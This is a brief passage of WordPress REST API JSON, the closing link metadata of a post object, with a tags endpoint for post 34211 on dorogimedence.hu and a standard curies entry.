tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=34211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}